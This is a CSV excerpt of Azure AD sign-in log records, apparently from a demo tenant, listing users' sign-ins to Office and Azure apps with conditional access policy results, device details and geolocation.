+14,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,04:24.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a36f5712-5714-478b-9e2f-0102b4ee9c3e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:04,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",b125da47-83a8-4791-90e4-983b0c4a1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,b125da47-83a8-4791-90e4-983b0c4a1000,SigninLogs,Sucess,33.7984581,-84.38828278
+15,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8b935e57-fec1-41c6-a890-977e4617a597,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f84b0ab1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,ec85dd07-c5e8-494c-aa5b-3f84b0ab1100,SigninLogs,Sucess,33.7984581,-84.38828278
+16,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:31.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,09cd469f-b017-0000-5421-761e16eceeaf,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d09c2317-414d-4072-ab4f-d2f620f11500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d09c2317-414d-4072-ab4f-d2f620f11500,SigninLogs,Sucess,41.90428925,-85.99833679
+17,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:36.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,accb8c02-0741-4d4d-89b5-5e0973843fb8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",98dc8e9a-f4c7-40e8-8c8c-df657a101400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,98dc8e9a-f4c7-40e8-8c8c-df657a101400,SigninLogs,Sucess,33.7984581,-84.38828278
+18,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:04.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cecd469f-10e5-0000-4780-a9a261c3bfe8,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",e9cd98cc-4177-459a-870c-d2e4b5051400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,e9cd98cc-4177-459a-870c-d2e4b5051400,SigninLogs,Sucess,41.90428925,-85.99833679
+19,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:05.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5e71f6c7-9aa3-49e2-8adc-bea9ec40665b,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 18:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",86807d56-c656-4319-9bdc-577e53f91600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,86807d56-c656-4319-9bdc-577e53f91600,SigninLogs,Sucess,41.90428925,-85.99833679
+20,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,10:28.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c8e3d50e-0502-4047-8840-3c2b1e49fa66,Microsoft.aadiam,Microsoft.aadiam,,Yoad Dvir,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 11:10,"{'operatingSystem': 'Windows 10', 'deviceId': 'ded7275c-9276-4b54-8054-9b421c33c42b', 'browser': 'Chrome 80.0.3987', 'displayName': 'YODVIR-BOOK2', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",56b829a9-b00c-4327-92e2-045512e45300,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.887760162353516, 'latitude': 32.084041595458984}, 'state': 'Hamerkaz', 'city': 'Petah Tikva'}",none,none,none,none,[],{'errorCode': 0},Yoad Dvir,71f0b003-5e79-4e8d-b085-ceeb8db6de3f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,56b829a9-b00c-4327-92e2-045512e45300,SigninLogs,Sucess,32.0840416,34.88776016
+21,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:30.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d5b4c0b4-28e0-4aa6-a055-b23662f82d33,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",82df5368-1a8b-4fb8-b076-b0dfebfb1000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,82df5368-1a8b-4fb8-b076-b0dfebfb1000,SigninLogs,Sucess,38.47222137,-77.41989899
